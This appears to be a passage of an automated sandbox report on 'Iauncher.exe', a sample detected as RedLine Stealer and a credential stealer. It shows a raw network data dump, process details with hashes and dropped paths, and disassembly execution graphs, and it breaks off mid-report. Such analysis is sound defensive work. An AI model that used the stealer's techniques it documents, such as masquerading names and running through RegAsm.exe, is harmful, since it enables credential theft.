                                                                                                                                                  2024-05-01 18:35:50 UTC1369INData Raw: 80 ed 6f 2f 99 6f ca f7 ec 14 9b 6e d2 19 d5 7b 96 c1 93 e9 32 31 6b d7 29 04 42 fe 84 24 39 1f b8 53 be b0 6a 3a 10 4c 4a ad cb bf 7b 18 98 40 c9 6c 9f 0e 7a 76 96 c2 0d d3 f5 c3 48 41 0f 23 4c 01 02 5d a9 6c cc e3 e4 69 80 87 e6 19 86 2a 0f 7b 29 17 c7 37 a5 0e 74 e4 b3 20 a5 76 5d 41 be 20 59 eb d4 cb 80 96 ef 82 10 1d f9 77 1d 9e 5b 5f 16 37 d3 c6 18 a7 3f 4b 2b 29 c8 37 cb 53 95 06 bb 49 b6 b3 ac c7 21 93 a8 b6 29 ed c3 ca 3b 3a 6e 3e b0 41 00 2b bf 8e fe 65 40 d7 a1 9c 6a d2 9e 1e 96 53 31 91 64 d7 65 7b 85 0f d0 a1 6d bf 62 24 81 06 9b 87 2c 0b 83 e6 ff 22 66 84 ca 01 3c 2e 38 6e f4 c6 35 6e b2 71 21 29 8b 92 ca 21 e5 26 81 53 6e b2 72 6c 33 9f ba c2 a6 ae b5 47 a6 a2 6d 4a d0 95 52 5e 8f 47 2b 37 d9 e0 cf ce b1 0a d8 b1 02 23 30 ce 2e b5 54 50 4b
                                                                                                                                                  Data Ascii: o/on{21k)B$9Sj:LJ{@lzvHA#L]li*{)7t v]A Yw[_7?K+)7SI!);:n>A+e@jS1de{mb$,"f<.8n5nq!)!&Snrl3GmJR^G+7#0.TPK


                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:20:35:40
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\Iauncher.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Iauncher.exe"
                                                                                                                                                  Imagebase:0x590000
                                                                                                                                                  File size:732'672 bytes
                                                                                                                                                  MD5 hash:E69FEB7FD40F408A088D879BE323F37A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:false

                                                                                                                                                  General

                                                                                                                                                  Target ID:11
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe"
                                                                                                                                                  Imagebase:0x560000
                                                                                                                                                  File size:505'344 bytes
                                                                                                                                                  MD5 hash:D79977A15EB010C637CF9078B4EB82C8
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:12
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  General

                                                                                                                                                  Target ID:13
                                                                                                                                                  Start time:20:35:50
                                                                                                                                                  Start date:01/05/2024
                                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  Imagebase:0x20000
                                                                                                                                                  File size:65'440 bytes
                                                                                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:high
                                                                                                                                                  Has exited:true

                                                                                                                                                  Disassembly

                                                                                                                                                  Reset < >

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:12.1%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:87%
                                                                                                                                                    Signature Coverage:8%
                                                                                                                                                    Total number of Nodes:300
                                                                                                                                                    Total number of Limit Nodes:34
                                                                                                                                                    execution_graph 77808 101f840 77809 101f886 GetCurrentProcess 77808->77809 77811 101f8d1 77809->77811 77812 101f8d8 GetCurrentThread 77809->77812 77811->77812 77813 101f915 GetCurrentProcess 77812->77813 77814 101f90e 77812->77814 77815 101f94b GetCurrentThreadId 77813->77815 77814->77813 77817 101f9a4 77815->77817 78026 101d7a0 78027 101d7e2 78026->78027 78028 101d7e8 GetModuleHandleW 78026->78028 78027->78028 78029 101d815 78028->78029 77818 5dd009f 77820 5dd00af 77818->77820 77819 5dd00e5 77820->77819 77833 5d6c5d8 77820->77833 77840 5d6c5e8 77820->77840 77821 5dd0abc 77825 5d6c5d8 GetCurrentThreadId 77821->77825 77826 5d6c5e8 GetCurrentThreadId 77821->77826 77822 5dd0c50 77829 5d6c5d8 GetCurrentThreadId 77822->77829 77830 5d6c5e8 GetCurrentThreadId 77822->77830 77823 5dd0d20 77847 5d63c58 77823->77847 77850 5d63c48 77823->77850 77824 5dd312a 77825->77822 77826->77822 77829->77823 77830->77823 77834 5d6c613 77833->77834 77835 5d6c60c 77833->77835 77839 5d6c63a 77834->77839 77854 5d6978c 77834->77854 77835->77821 77838 5d6978c GetCurrentThreadId 77838->77839 77839->77821 77841 5d6c613 77840->77841 77842 5d6c60c 77840->77842 77843 5d6978c GetCurrentThreadId 77841->77843 77846 5d6c63a 77841->77846 77842->77821 77844 5d6c630 77843->77844 77845 5d6978c GetCurrentThreadId 77844->77845 77845->77846 77846->77821 77858 5d62828 77847->77858 77849 5d63c6f 77849->77824 77851 5d63c58 77850->77851 77852 5d62828 2 API calls 77851->77852 77853 5d63c6f 77852->77853 77853->77824 77855 5d69797 77854->77855 77856 5d6c94f GetCurrentThreadId 77855->77856 77857 5d6c630 77855->77857 77856->77857 77857->77838 77859 5d62833 77858->77859 77860 5d63d28 77859->77860 77866 5d69f60 77859->77866 77870 5d63d48 77859->77870 77874 5d63d39 77859->77874 77878 5d69f50 77859->77878 77860->77849 77861 5d63cf2 77861->77849 77867 5d69f76 77866->77867 77868 5d63d48 KiUserCallbackDispatcher 77867->77868 77869 5d69fb8 77868->77869 77869->77861 77871 5d63d77 77870->77871 77872 5d63dfe 77871->77872 77873 5d63e89 KiUserCallbackDispatcher 77871->77873 77873->77872 77876 5d63d77 77874->77876 77875 5d63dfe 77876->77875 77877 5d63e89 KiUserCallbackDispatcher 77876->77877 77877->77875 77879 5d69f5f 77878->77879 77880 5d63d48 KiUserCallbackDispatcher 77879->77880 77881 5d69fb8 77880->77881 77881->77861 78035 5db9218 78039 5db9231 78035->78039 78043 5db9240 78035->78043 78036 5db922c 78040 5db9240 78039->78040 78046 5db9319 78040->78046 78045 5db9319 2 API calls 78043->78045 78044 5db927e 78044->78036 78045->78044 78047 5db9344 78046->78047 78049 5d63c58 2 API calls 78047->78049 78050 5d63c48 2 API calls 78047->78050 78048 5db927e 78048->78036 78049->78048 78050->78048 78051 75ea398 78052 75ea3c5 78051->78052 78053 75ea3b2 78051->78053 78064 75e78a4 78052->78064 78059 75e7894 78053->78059 78056 75ea40b 78057 75ea3da 78057->78056 78058 75e7894 OleInitialize 78057->78058 78058->78056 78060 75e789f 78059->78060 78061 75ea436 78060->78061 78069 75ea460 78060->78069 78075 75ea470 78060->78075 78061->78052 78066 75e78af 78064->78066 78065 75eaa4e 78065->78057 78066->78065 78088 75ec418 78066->78088 78094 75ec428 78066->78094 78070 75ea778 78069->78070 78071 75ea498 78069->78071 78070->78061 78072 75ea4a1 78071->78072 78081 75e7934 78071->78081 78072->78061 78074 75ea4c4 78076 75ea778 78075->78076 78077 75ea498 78075->78077 78076->78061 78078 75ea4a1 78077->78078 78079 75e7934 OleInitialize 78077->78079 78078->78061 78080 75ea4c4 78079->78080 78083 75e793f 78081->78083 78082 75ea7bb 78082->78074 78083->78082 78085 75e7950 78083->78085 78086 75ea7f0 OleInitialize 78085->78086 78087 75ea854 78086->78087 78087->78082 78089 75ec428 78088->78089 78090 75ec479 GetFocus 78089->78090 78091 75ec4e6 78089->78091 78092 75ec4a1 78090->78092 78091->78065 78092->78091 78093 75ec4e4 KiUserCallbackDispatcher 78092->78093 78093->78091 78095 75ec46c 78094->78095 78097 75ec4e6 78094->78097 78096 75ec479 GetFocus 78095->78096 78095->78097 78098 75ec4a1 78096->78098 78097->78065 78098->78097 78099 75ec4e4 KiUserCallbackDispatcher 78098->78099 78099->78097 77882 101d848 77883 101d85c 77882->77883 77884 101d881 77883->77884 77886 101cfc8 77883->77886 77887 101da28 LoadLibraryExW 77886->77887 77889 101daa1 77887->77889 77889->77884 78004 101fa88 DuplicateHandle 78005 101fb1e 78004->78005 77890 5db9390 77891 5db93c6 77890->77891 77892 5db9485 77891->77892 77894 5dbc3e0 77891->77894 77895 5dbc3e5 77894->77895 77896 5dbc482 77895->77896 77897 5dbc451 MonitorFromPoint 77895->77897 77896->77892 77897->77896 77747 75e0450 77748 75e0470 77747->77748 77752 5db17a0 SendMessageW 77748->77752 77754 5db179b 77748->77754 77749 75e0481 77753 5db180c 77752->77753 77753->77749 77755 5db17a0 SendMessageW 77754->77755 77756 5db180c 77755->77756 77756->77749 77766 75e0270 77767 75e0278 77766->77767 77769 75e028b 77767->77769 77772 5dba520 77767->77772 77777 5dbac28 77767->77777 77768 75e0334 77774 5dba52b 77772->77774 77773 5dbb0bd 77773->77768 77774->77773 77782 5dbb560 77774->77782 77788 5dbb550 77774->77788 77778 5dbac38 77777->77778 77779 5dbb0bd 77778->77779 77780 5dbb550 2 API calls 77778->77780 77781 5dbb560 2 API calls 77778->77781 77779->77768 77780->77779 77781->77779 77795 5dba568 77782->77795 77785 5dbb587 77785->77773 77786 5dbb5b0 CreateIconFromResourceEx 77787 5dbb62e 77786->77787 77787->77773 77789 5dbb560 77788->77789 77790 5dba568 CreateIconFromResourceEx 77789->77790 77792 5dbb57a 77790->77792 77791 5dbb587 77791->77773 77792->77791 77793 5dbb5b0 CreateIconFromResourceEx 77792->77793 77794 5dbb62e 77793->77794 77794->77773 77796 5dbb5b0 CreateIconFromResourceEx 77795->77796 77797 5dbb57a 77796->77797 77797->77785 77797->77786 77898 9bf20f0 77899 9bf2148 77898->77899 77900 9bf2102 77898->77900 77900->77899 77902 9bf02d8 77900->77902 77903 9bf2280 SetTimer 77902->77903 77904 9bf22ec 77903->77904 77904->77899 77905 9bffbf0 77908 9bffc0e 77905->77908 77911 9bf02e4 77908->77911 77910 9bffbfc 77912 9bf02ef 77911->77912 77915 9bff178 77912->77915 77914 9bffc65 77914->77910 77916 9bff183 77915->77916 77917 9bffdd1 GetCurrentThreadId 77916->77917 77918 9bffdfb 77916->77918 77917->77918 77918->77914 77919 5d8ab88 77920 5d8abd6 DrawTextExW 77919->77920 77922 5d8ac2e 77920->77922 77923 5db13a8 77924 5db13ce 77923->77924 77925 5db13be 77923->77925 77925->77924 77927 5db1503 77925->77927 77928 5db150b 77927->77928 77929 5db14e4 77927->77929 77930 5db1520 77928->77930 77932 5db1568 77928->77932 77929->77924 77930->77924 77933 5db1574 77932->77933 77934 5db157a 77933->77934 77938 5db174f 77933->77938 77944 5db1768 77933->77944 77934->77930 77935 5db1594 77935->77930 77939 5db1734 77938->77939 77940 5db175b 77938->77940 77939->77935 77942 5db179b SendMessageW 77940->77942 77943 5db17a0 SendMessageW 77940->77943 77941 5db1789 77941->77935 77942->77941 77943->77941 77945 5db1778 77944->77945 77947 5db179b SendMessageW 77945->77947 77948 5db17a0 SendMessageW 77945->77948 77946 5db1789 77946->77935 77947->77946 77948->77946 77757 75e9c4b 77758 75e9c5e 77757->77758 77762 75e9dc2 PostMessageW 77758->77762 77764 75e9dc8 PostMessageW 77758->77764 77759 75e9c81 77763 75e9e34 77762->77763 77763->77759 77765 75e9e34 77764->77765 77765->77759 78030 9bf2208 78031 9bf2215 78030->78031 78032 9bf2230 78030->78032 78032->78031 78033 9bf02e4 GetCurrentThreadId 78032->78033 78034 9bf2241 78033->78034 78104 9bf0848 DispatchMessageW 78105 9bf08b4 78104->78105 77949 1015f78 77951 1015f94 77949->77951 77950 1016009 77951->77950 77955 1016218 77951->77955 77960 5dbe6e8 77951->77960 77964 5dbe6d8 77951->77964 77956 101623d 77955->77956 77968 1016328 77956->77968 77972 1016318 77956->77972 77961 5dbe6fa 77960->77961 77980 5dbe340 77961->77980 77965 5dbe6e8 77964->77965 77966 5dbe340 4 API calls 77965->77966 77967 5dbe71a 77966->77967 77967->77951 77969 101634f 77968->77969 77970 101642c 77969->77970 77976 1015e24 77969->77976 77974 101634f 77972->77974 77973 101642c 77973->77973 77974->77973 77975 1015e24 CreateActCtxA 77974->77975 77975->77973 77977 10173b8 CreateActCtxA 77976->77977 77979 101747b 77977->77979 77981 5dbe34b 77980->77981 77984 5dbe37c 77981->77984 77983 5dbe82c 77983->77983 77985 5dbe387 77984->77985 77986 5dbead2 77985->77986 77989 75ef478 77985->77989 77995 75ef467 77985->77995 77986->77983 77993 75ef4dd 77989->77993 77991 75ed834 PeekMessageW 77991->77993 77992 75ef940 WaitMessage 77992->77993 77993->77991 77993->77992 77994 75ef52a 77993->77994 78001 75ed84c 77993->78001 77994->77986 77999 75ef461 77995->77999 77996 75ed834 PeekMessageW 77996->77999 77997 75ed84c KiUserCallbackDispatcher 77997->77999 77998 75ef940 WaitMessage 77998->77999 77999->77995 77999->77996 77999->77997 77999->77998 78000 75ef52a 77999->78000 78000->77986 78002 75efd10 KiUserCallbackDispatcher 78001->78002 78003 75efd84 78002->78003 78003->77993 77798 5db1de0 77799 5db1dea 77798->77799 77800 5db1d6c 77798->77800 77802 5db1d81 SendMessageW 77800->77802 77803 5db1dbc 77802->77803 77803->77798 77804 5db12e0 77805 5db1325 GetClassInfoW 77804->77805 77807 5db136b 77805->77807 78006 5dbab40 78007 5dbab7a 78006->78007 78008 5dbac0b 78007->78008 78009 5dbabf6 78007->78009 78011 5dba520 3 API calls 78008->78011 78010 5dba520 3 API calls 78009->78010 78012 5dbac01 78010->78012 78013 5dbac1a 78011->78013 78014 5db2a40 78016 5d62828 2 API calls 78014->78016 78018 5d63c78 78014->78018 78015 5db2a57 78016->78015 78019 5d63c88 78018->78019 78020 5d63d28 78019->78020 78022 5d69f50 KiUserCallbackDispatcher 78019->78022 78023 5d69f60 KiUserCallbackDispatcher 78019->78023 78024 5d63d48 KiUserCallbackDispatcher 78019->78024 78025 5d63d39 KiUserCallbackDispatcher 78019->78025 78020->78015 78021 5d63cf2 78021->78015 78022->78021 78023->78021 78024->78021 78025->78021 78100 5db1200 78101 5db1248 SetWindowTextW 78100->78101 78102 5db1242 78100->78102 78103 5db1279 78101->78103 78102->78101 78106 75e02a0 78107 75e02b1 78106->78107 78108 75e02d3 78107->78108 78110 5dbac28 3 API calls 78107->78110 78111 5dba520 3 API calls 78107->78111 78109 75e0334 78110->78109 78111->78109

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 05DD009F Relevance: 9.5, Strings: 2, Instructions: 6991COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 294 5dd009f-5dd00e3 297 5dd00ed-5dd0188 294->297 298 5dd00e5-5dd00ec 294->298 1705 5dd018b call 5dd8daf 297->1705 1706 5dd018b call 5dd8dc0 297->1706 310 5dd0190-5dd0203 call 5dd9b20 1714 5dd0206 call 5d64920 310->1714 1715 5dd0206 call 5d64919 310->1715 319 5dd020b-5dd02b3 1724 5dd02b9 call 5d65508 319->1724 1725 5dd02b9 call 5d654f9 319->1725 331 5dd02be-5dd02e5 1693 5dd02eb call 5d83e18 331->1693 1694 5dd02eb call 5d83e07 331->1694 334 5dd02f0-5dd0502 1701 5dd0508 call 5d84f48 334->1701 1702 5dd0508 call 5d84f37 334->1702 367 5dd050d-5dd063a 1716 5dd0640 call 5d852d0 367->1716 1717 5dd0640 call 5d852c3 367->1717 385 5dd0645-5dd0ab6 1712 5dd0ab9 call 5d6c5d8 385->1712 1713 5dd0ab9 call 5d6c5e8 385->1713 446 5dd0abc-5dd0c4a 1695 5dd0c4d call 5d6c5d8 446->1695 1696 5dd0c4d call 5d6c5e8 446->1696 462 5dd0c50-5dd0d1a 1707 5dd0d1d call 5d6c5d8 462->1707 1708 5dd0d1d call 5d6c5e8 462->1708 470 5dd0d20-5dd0f35 1726 5dd0f38 call 5d865d8 470->1726 1727 5dd0f38 call 5d865c9 470->1727 491 5dd0f3b-5dd1326 1703 5dd1328 call 5d8bf70 491->1703 1704 5dd1328 call 5d8bf60 491->1704 532 5dd132d-5dd15a6 558 5dd15a8-5dd15b4 532->558 559 5dd15d0 532->559 561 5dd15be-5dd15c4 558->561 562 5dd15b6-5dd15bc 558->562 560 5dd15d6-5dd169d 559->560 1709 5dd169f call 5d8df98 560->1709 1710 5dd169f call 5d8dfa8 560->1710 563 5dd15ce 561->563 562->563 563->560 571 5dd16a4-5dd3081 1722 5dd3083 call 5db0a80 571->1722 1723 5dd3083 call 5db0a70 571->1723 844 5dd3088-5dd3123 1697 5dd3125 call 5d63c58 844->1697 1698 5dd3125 call 5d63c48 844->1698 850 5dd312a-5dd3d16 968 5dd3d18-5dd3d24 850->968 969 5dd3d40 850->969 971 5dd3d2e-5dd3d34 968->971 972 5dd3d26-5dd3d2c 968->972 970 5dd3d46-5dd3ecd 969->970 988 5dd3ed4-5dd4f0d 970->988 973 5dd3d3e 971->973 972->973 973->970 1150 5dd4f0f-5dd4f1b 988->1150 1151 5dd4f37 988->1151 1152 5dd4f1d-5dd4f23 1150->1152 1153 5dd4f25-5dd4f2b 1150->1153 1154 5dd4f3d-5dd7243 1151->1154 1155 5dd4f35 1152->1155 1153->1155 1503 5dd726d 1154->1503 1504 5dd7245-5dd7251 1154->1504 1155->1154 1507 5dd7273-5dd7fe3 1503->1507 1505 5dd725b-5dd7261 1504->1505 1506 5dd7253-5dd7259 1504->1506 1508 5dd726b 1505->1508 1506->1508 1642 5dd7fef-5dd7ffb 1507->1642 1508->1507 1718 5dd8001 call 5d6c3d0 1642->1718 1719 5dd8001 call 5d6c3c0 1642->1719 1643 5dd8006-5dd80db 1653 5dd80e6-5dd8100 1643->1653 1654 5dd8106-5dd81ce 1653->1654 1663 5dd81f8 1654->1663 1664 5dd81d0-5dd81dc 1654->1664 1665 5dd81fe-5dd82f9 1663->1665 1666 5dd81de-5dd81e4 1664->1666 1667 5dd81e6-5dd81ec 1664->1667 1680 5dd8300-5dd830d 1665->1680 1668 5dd81f6 1666->1668 1667->1668 1668->1665 1720 5dd830f call 5d833a0 1680->1720 1721 5dd830f call 5d83391 1680->1721 1681 5dd8314-5dd83e0 1691 5dd83ec-5dd83f8 1681->1691 1699 5dd83fe call 5d63190 1691->1699 1700 5dd83fe call 5d631a0 1691->1700 1692 5dd8403-5dd840b 1693->334 1694->334 1695->462 1696->462 1697->850 1698->850 1699->1692 1700->1692 1701->367 1702->367 1703->532 1704->532 1705->310 1706->310 1707->470 1708->470 1709->571 1710->571 1712->446 1713->446 1714->319 1715->319 1716->385 1717->385 1718->1643 1719->1643 1720->1681 1721->1681 1722->844 1723->844 1724->331 1725->331 1726->491 1727->491
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 'Aq$$Aq
                                                                                                                                                    • API String ID: 0-3116551248
                                                                                                                                                    • Opcode ID: 05a283c120ab1e941c7987f2dfbdc661f42e2346b2bb5a97085f4b61c3089a72
                                                                                                                                                    • Instruction ID: 177abbd00fb1a543ff8fb609a706247fa7a415d56be59c823621d688da39ab2a
                                                                                                                                                    • Opcode Fuzzy Hash: 05a283c120ab1e941c7987f2dfbdc661f42e2346b2bb5a97085f4b61c3089a72
                                                                                                                                                    • Instruction Fuzzy Hash: 84047078905229CFCB25DF64D888AD9B7B1FF49305F1485EAE909A7361DB31AE81CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9C54 Relevance: 9.0, Strings: 6, Instructions: 1463COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1728 9ca9c54-9cab0c2 1731 9cab0c9-9cab184 call 9ca9c88 1728->1731 1732 9cab0c4 1728->1732 1736 9cab18a-9cab191 1731->1736 1737 9cab374-9cab588 call 9ca9c88 1731->1737 1732->1731 1736->1736 1738 9cab193-9cab198 1736->1738 1767 9cab589-9cab7a4 call 9ca3e30 call 9ca9c98 1737->1767 1739 9cab1aa-9cab1b8 1738->1739 1740 9cab19a-9cab1a4 1738->1740 1742 9cab1ea-9cab1ec 1739->1742 1743 9cab1ba-9cab1c1 1739->1743 1740->1739 1747 9cab1f2-9cab200 1742->1747 1743->1743 1746 9cab1c3-9cab1e8 1743->1746 1746->1747 1748 9cab28c-9cab2ce call 9ca5180 1747->1748 1749 9cab206-9cab20d 1747->1749 1762 9cab2e8-9cab358 1748->1762 1763 9cab2d0-9cab2d7 1748->1763 1749->1749 1753 9cab20f-9cab287 call 9ca3310 * 2 1749->1753 1765 9cab36d-9cab36f 1753->1765 1768 9cab36c 1762->1768 1774 9cab35a-9cab361 1762->1774 1763->1763 1766 9cab2d9-9cab2e3 1763->1766 1765->1767 1766->1768 1796 9cab7aa-9cab7b1 1767->1796 1797 9cab832-9cab9d1 call 9ca3e30 call 9ca9c98 1767->1797 1768->1765 1774->1774 1777 9cab363-9cab36b 1774->1777 1777->1768 1796->1796 1798 9cab7b3-9cab831 1796->1798 1814 9cabccb-9cabcf8 1797->1814 1815 9cab9d7-9cab9f2 1797->1815 1798->1797 1816 9cabcfa-9cabd01 1814->1816 1817 9cabd0d-9cabd2c call 9ca5180 1814->1817 1818 9cab9f8-9caba9f call 9ca5388 call 9ca7ac0 1815->1818 1819 9cabbdc-9cabbf5 1815->1819 1816->1816 1820 9cabd03 1816->1820 1826 9cabd5b-9cabd69 1817->1826 1827 9cabd2e-9cabd35 1817->1827 1843 9cabaa1 1818->1843 1844 9cabaa6-9cabb41 call 9ca5388 1818->1844 1960 9cabbf7 call 9bf80f0 1819->1960 1961 9cabbf7 call 9bf80e0 1819->1961 1820->1817 1823 9cabbfc-9cabcbd call 9bf8c3a 1849 9cabcc2-9cabcc3 1823->1849 1831 9cabd77-9cabe46 call 9ca3dd0 1826->1831 1827->1827 1829 9cabd37-9cabd50 call 9ca9ca8 1827->1829 1838 9cabd6b-9cabd71 1829->1838 1839 9cabd52-9cabd59 1829->1839 1863 9cabe48-9cabe4f 1831->1863 1864 9cabe8d-9cabeea call 9ca3dd0 1831->1864 1838->1831 1839->1826 1839->1839 1843->1844 1868 9cabb47-9cabbd4 1844->1868 1869 9cabbd5-9cabbd7 1844->1869 1851 9cabcc4-9cabcc6 1849->1851 1853 9cac257-9cac26e 1851->1853 1856 9cac3d7-9cac3ee 1853->1856 1857 9cac274-9cac3d6 call 9ca70f0 * 2 call 9ca72b0 1853->1857 1860 9cac596-9cac5ed call 9ca5268 1856->1860 1861 9cac3f4-9cac3fb 1856->1861 1857->1856 1880 9cac5ef-9cac5f6 1860->1880 1881 9cac624-9cac652 1860->1881 1861->1861 1866 9cac3fd-9cac595 call 9ca70f0 * 2 call 9ca72b0 1861->1866 1863->1863 1870 9cabe51-9cabe88 1863->1870 1893 9cabeec-9cabef3 1864->1893 1894 9cabf2d-9cabf42 1864->1894 1866->1860 1868->1869 1869->1851 1892 9cabf43-9cabf87 1870->1892 1880->1880 1885 9cac5f8-9cac623 1880->1885 1896 9cac658-9cac65f 1881->1896 1897 9cac707-9cac75e call 9ca5268 1881->1897 1885->1881 1904 9cac09a-9cac255 call 9ca3310 1892->1904 1905 9cabf8d-9cabf94 1892->1905 1893->1893 1901 9cabef5-9cabf2b 1893->1901 1894->1892 1896->1896 1902 9cac661-9cac6c1 call 9ca5268 1896->1902 1925 9cac760-9cac767 1897->1925 1926 9cac795 1897->1926 1901->1892 1928 9cac6c3-9cac6ca 1902->1928 1929 9cac700-9cac702 1902->1929 1955 9cac256 1904->1955 1905->1905 1909 9cabf96-9cabfcd call 9ca5180 1905->1909 1930 9cabfcf-9cac001 1909->1930 1931 9cac003-9cac025 1909->1931 1925->1925 1934 9cac769-9cac794 1925->1934 1927 9cac796-9cac79e 1926->1927 1928->1928 1935 9cac6cc-9cac6ff 1928->1935 1929->1927 1944 9cac02b-9cac095 1930->1944 1931->1944 1934->1926 1935->1929 1944->1955 1955->1853 1960->1823 1961->1823
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: d$d$d$d$d$d
                                                                                                                                                    • API String ID: 0-3846220497
                                                                                                                                                    • Opcode ID: 7fb12373f329d5528b1197b57577b39ffea3f37e970ae274741d20f62c7e2da3
                                                                                                                                                    • Instruction ID: 505454eb53f8dc7560361079d1a07edb6a0b6264415de5a9fe3503ce0ea1c545
                                                                                                                                                    • Opcode Fuzzy Hash: 7fb12373f329d5528b1197b57577b39ffea3f37e970ae274741d20f62c7e2da3
                                                                                                                                                    • Instruction Fuzzy Hash: 76E2D335900A299FCB22DF64CC54BDABBB2FF4A305F0591E5E509AB261DB319E95CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DBA520 Relevance: 6.9, Strings: 5, Instructions: 622COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
